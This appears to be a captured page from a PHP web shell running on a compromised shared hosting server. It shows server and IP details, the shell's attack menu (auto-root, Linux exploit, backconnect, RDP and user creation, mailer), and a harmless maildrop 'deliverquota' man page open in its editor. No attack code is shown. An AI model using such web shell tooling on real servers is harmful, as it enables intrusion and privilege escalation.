Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
maildrop /
html /
[ HOME SHELL ]
Name
Size
Permission
Action
deliverquota.html
5.23
KB
-rw-r--r--
lockmail.html
8.6
KB
-rw-r--r--
mailbot.html
25.08
KB
-rw-r--r--
maildir.html
19.56
KB
-rw-r--r--
maildiracl.html
18.04
KB
-rw-r--r--
maildirkw.html
3.71
KB
-rw-r--r--
maildirmake.html
12.17
KB
-rw-r--r--
maildirquota.html
6.28
KB
-rw-r--r--
maildrop.html
31.92
KB
-rw-r--r--
maildropex.html
11.11
KB
-rw-r--r--
maildropfilter.html
92.87
KB
-rw-r--r--
maildropgdbm.html
9.95
KB
-rw-r--r--
makedat.html
5.7
KB
-rw-r--r--
makemime.html
26.29
KB
-rw-r--r--
manpage.css
366
B
-rw-r--r--
reformail.html
9.83
KB
-rw-r--r--
reformime.html
17.06
KB
-rw-r--r--
rfc2045.html
22.36
KB
-rw-r--r--
rfc822.html
24.8
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : deliverquota.html
<?xml version="1.0"?> <html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/><title>deliverquota</title><link rel="stylesheet" type="text/css" href="style.css"/><meta name="generator" content="DocBook XSL Stylesheets V1.78.1"/><link rel="home" href="#idm255241141216" title="deliverquota"/><link xmlns="" rel="stylesheet" type="text/css" href="manpage.css"/><meta xmlns="" name="MSSmartTagsPreventParsing" content="TRUE"/><link xmlns="" rel="icon" href="icon.gif" type="image/gif"/><!-- Copyright 1998 - 2009 Double Precision, Inc. See COPYING for distribution information. --></head><body><div class="refentry"><a id="idm255241141216" shape="rect"> </a><div class="titlepage"/><div class="refnamediv"><h2>Name</h2><p>deliverquota — deliver to a maildir with a quota</p></div><div class="refsynopsisdiv"><h2>Synopsis</h2><div class="cmdsynopsis"><p><code class="command">deliverquota</code> [-c] [-w <em class="replaceable"><code>percent</code></em>] [-W <em class="replaceable"><code>filename</code></em>] {<em class="replaceable"><code>maildir</code></em>} {<em class="replaceable"><code>quota</code></em>}</p></div></div><div class="refsect1"><a id="idm255245589600" shape="rect"> </a><h2>DESCRIPTION</h2><p> <span class="command"><strong>deliverquota</strong></span> delivers mail to a <em class="replaceable"><code>maildir</code></em> taking into account any software-imposed quota on the maildir. This manually-enforced quota mechanism is described in the <a class="ulink" href="maildirquota.html" target="_top" shape="rect"><span class="citerefentry"><span class="refentrytitle">maildirquota</span>(7)</span></a> and <a class="ulink" href="maildirmake.html" target="_top" shape="rect"><span class="citerefentry"><span class="refentrytitle">maildirmake</span>(1)</span></a> manual pages. Instead of setting up your mail server to deliver the message directly to a maildir, configure the mail server to run the <span class="command"><strong>deliverquota</strong></span> program in order to deliver the message, and specify the location of the maildir as the argument to <span class="command"><strong>deliverquota</strong></span>.</p><p> The second argument to <span class="command"><strong>deliverquota</strong></span> is optional. If present, <em class="replaceable"><code>quota</code></em> specifies a new quota setting for this maildir. Specifying <em class="replaceable"><code>quota</code></em> is equivalent to running <a class="ulink" href="maildirmake.html" target="_top" shape="rect"><span class="citerefentry"><span class="refentrytitle">maildirmake</span>(1)</span></a> with the <code class="option">-q</code> option. The second argument to <span class="command"><strong>deliverquota</strong></span> is considered obsolete, and may be removed in the future.</p><p> <span class="command"><strong>deliverquota</strong></span> reads the message from standard input and delivers it to <em class="replaceable"><code>maildir</code></em>. <em class="replaceable"><code>maildir</code></em> may specify a path directly to a maildir folder, not the main <em class="replaceable"><code>maildir</code></em> (as long as the folder was created by the <a class="ulink" href="maildirmake.html" target="_top" shape="rect"><span class="citerefentry"><span class="refentrytitle">maildirmake</span>(1)</span></a> command.</p><p> The <code class="option">-c</code> option automatically creates the maildir, and all missing parent subdirectories (as '<span class="command"><strong>mkdir -p</strong></span>'). This option should be used with caution.</p><p> The <code class="option">-w N</code> option places a warning message into the maildir if the maildir has a quota setting, and after the message was successfully delivered the maildir was at least <em class="replaceable"><code>N</code></em> percent full. The warning message is copied from the file specified by the <code class="option">-W</code> option, or from <code class="filename">/etc/quotawarnmsg</code> if <code class="option">-W</code> was not specified. The "<code class="literal">Date:</code>" and "<code class="literal">Message-Id:</code>" headers are added to the message. The warning is repeated every 24 hours (at least), until the maildir drops below <em class="replaceable"><code>N</code></em> percent full.</p></div><div class="refsect1"><a id="idm255243934560" shape="rect"> </a><h2>RETURN CODE</h2><p> <span class="command"><strong>deliverquota</strong></span> delivers the message to the maildir and terminates with exit code 0 if the message can be delivered without going over quota.</p><p> If the maildir is over its specified quota, <span class="command"><strong>deliverquota</strong></span> terminates with exit code 77 (EX_NOPERM).</p></div><div class="refsect1"><a id="idm255243931472" shape="rect"> </a><h2>SEE ALSO</h2><p> <a class="ulink" href="maildirquota.html" target="_top" shape="rect"><span class="citerefentry"><span class="refentrytitle">maildirquota</span>(7)</span></a>, <a class="ulink" href="maildirmake.html" target="_top" shape="rect"><span class="citerefentry"><span class="refentrytitle">maildirmake</span>(1)</span></a>, <a class="ulink" href="http://www.qmail.org/man/man5/maildir.html" target="_top" shape="rect">http://www.qmail.org/man/man5/maildir.html</a>. </p></div></div></body></html>
Close